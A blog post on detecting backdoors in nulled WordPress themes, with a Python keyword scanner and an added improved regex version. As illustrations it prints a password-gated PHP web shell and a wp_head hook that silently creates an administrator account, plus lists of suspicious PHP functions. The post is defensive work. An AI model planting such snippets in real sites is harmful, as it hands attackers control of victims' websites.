Apr 16, 2020

WordPress nulled theme checker

We all love free stuff, so many people try to install premium themes and plugins on their WordPress blogs. Most of them use nulled themes or cracked versions of premium themes. The main disadvantage of these nulled themes is that most of them are back-doored.

If we want to scan a plugin or theme for back-doors, we must open all of its files and check for suspicious code manually. Normally a WordPress theme contains hundreds of files in various directories, so it's very hard to check all of them one by one. So I tried to write a simple Python script to automate this process.

As the first step I used the following code to get a list of all PHP files in the theme or plugin, because many back-doors are hidden in these PHP files.

import os

# Walk the theme directory and print the path of every PHP file
for root, dirs, files in os.walk("C:\\xampp\\htdocs\\wordpress\\wp-content\\themes\\twentytwenty"):
    for file in files:
        if file.endswith(".php"):
            file_path = os.path.join(root, file)
            print(file_path)

In the following image you can see that we could get a list of all PHP files in the theme.

For demonstration purposes I used the "twentytwenty" theme, which comes built in with WordPress.

Next we need to find suspicious code in these PHP files.

Reverse and Bind shells

This is the most common backdoor we can find in WordPress themes. This kind of back-door allows an attacker to connect remotely to a server. So when you install a back-doored theme on your WordPress site, the attacker gains access to your site and can completely control your website. There are two kinds of web shells. A reverse TCP shell opens a TCP connection from the victim server to the attacker's machine, while a bind shell opens a port on the victim server and waits for an incoming connection from the attacker.

In the following example we can see a simple PHP shell.

if(isset($_GET["cmd"])&&isset($_GET["passwd"])&&strcmp($_GET["passwd"],"p455w07d")==0){echo exec($_GET["cmd"]);} 

As we know, functions like exec and system are used for these web shells. So I added all of the keywords used to build a shell to a Python list. Then we can scan PHP files for these function names. If we find one of them in a PHP file, we can assume there is some suspicious code in that file.


shell_payloads = ['exec', 'system', 'pcntl_fork', 'proc_open', 'fsockopen']

Here the exec and system functions are used to build a reverse TCP shell; pcntl_fork, proc_open and fsockopen are used to build bind shells.

User adding back-doors

There is also another type of back-door. It uses WordPress native functions to create a secret user, so an attacker can directly log in to our site and make changes.

Here we can see how these functions work.

add_action( 'wp_head', 'create_backdoor' );

function create_backdoor() {
    require( 'wp-includes/registration.php' );
    if ( !username_exists( 'anonymous' ) ) {
        $user_id = wp_create_user( 'anonymous', 'p455w07d' );
        $user = new WP_User( $user_id );
        $user->set_role( 'administrator' );
    }
}

In the following list I added those functions as payloads.

user_payloads = ['wp_create_user', 'WP_User', 'set_role']

So we can detect if a PHP file tries to create a new backdoor user.

Encoded back-doors

Most of the time malware authors try to hide their malicious code, so they encode it. In most back-doored themes we can see base64 encoded payloads. Using this, we can search for PHP's encoding functions, because they are rarely used in normal WordPress themes and plugins.

encoding_payloads = ['eval', 'base64_decode']

Here the base64_decode function is used for payloads encoded with the base64 algorithm. eval is another PHP function. It takes one string as its argument and executes it as PHP code. So an attacker can use base64_decode to decode the encoded payload and use eval to execute it. In the following code we can see the base64 encoded version of our web shell above.


Now we know what methods an attacker uses to backdoor a theme or plugin. Let's complete our script to detect them. At the moment we have three Python lists with payloads to detect suspicious words.

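payloads = shell_payloads + user_payloads + encoding_payloads

# Read the file and report it if any payload keyword appears in its content
with open(file_path, 'r', errors='ignore') as file:
    content = file.read()
    for payload in payloads:
        if payload in content:
            print('suspicious code found at ' + file_path)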

I hope you can understand what it does. The script opens the file and reads its contents. Then it scans that content to detect whether it contains any of the above malicious words. If it detects one of them, it will print the file path, so we can check that file manually and remove the backdoor.
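The plain substring test also fires on names such as curl_exec or the word "filesystem". As an added example (not the author's script), the sketch below uses the same three keyword lists but matches them only as function calls, ignores case as PHP does, and reports the line number and category. The two theme files it scans are constructed samples.

```python
import os
import re
import tempfile

# Keyword lists from the post, grouped by backdoor category.
PAYLOADS = {
    "shell": ["exec", "system", "pcntl_fork", "proc_open", "fsockopen"],
    "user": ["wp_create_user", "WP_User", "set_role"],
    "encoding": ["eval", "base64_decode"],
}
CATEGORY = {n.lower(): c for c, names in PAYLOADS.items() for n in names}

# A keyword counts only as a whole identifier followed by "(", so curl_exec(
# or the word "filesystem" is ignored. PHP function names are case-insensitive.
CALL = re.compile(r"(?<![\w$])(" + "|".join(map(re.escape, CATEGORY)) + r")\s*\(", re.I)

def scan_file(path):
    """Return (line_number, category, keyword) for every suspicious call."""
    hits = []
    with open(path, "r", errors="ignore") as handle:
        for number, line in enumerate(handle, start=1):
            for match in CALL.finditer(line):
                name = match.group(1).lower()
                hits.append((number, CATEGORY[name], name))
    return hits

def scan_tree(theme_path):
    """Walk the theme as the post does; map each flagged PHP file to its hits."""
    report = {}
    for root, _dirs, files in os.walk(theme_path):
        for file in files:
            if file.lower().endswith(".php"):
                path = os.path.join(root, file)
                hits = scan_file(path)
                if hits:
                    report[os.path.relpath(path, theme_path)] = hits
    return report

def demo():
    """Scan a constructed two-file theme (sample content, not a real theme)."""
    with tempfile.TemporaryDirectory() as theme:
        with open(os.path.join(theme, "clean.php"), "w") as f:
            f.write("<?php // filesystem helper\n$r = curl_exec($ch);\n")
        with open(os.path.join(theme, "bad.php"), "w") as f:
            f.write("<?php\nEVAL(base64_decode($x));\n$u->set_role('administrator');\n")
        return scan_tree(theme)

if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

A hit still only marks a line for manual review; legitimate plugins also call some of these functions.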

You may download the complete script here. You need to change the theme_path according to your theme. Just try it and tell me how it works. I admire your opinions about this little tool, so leave a comment on what the mistakes are and how we can improve it. Thank you for reading.



Thilan Danushka Dissanayaka

Thilan Dissanayaka

Hi, I'm Thilan from Sri Lanka. An undergraduate Engineering student of University of Ruhuna. I love to explore things about CS, Hacking, Reverse engineering etc.